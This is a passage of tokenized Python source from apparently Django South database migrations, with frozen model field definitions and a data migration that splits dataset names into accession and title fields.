'<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:filename>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:id>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:None>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' 
: ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> for dataSet in orm [ '<STR_LIT>' ] . objects . all ( ) : <EOL> colonPos = dataSet . name . find ( '<STR_LIT::>' ) <EOL> if ( colonPos >= <NUM_LIT:0> ) : <EOL> dataSet . accession = dataSet . name [ : colonPos ] <EOL> dataSet . title = dataSet . name [ colonPos + <NUM_LIT:2> : ] <EOL> dataSet . save ( ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , 
{ '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , 
'<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 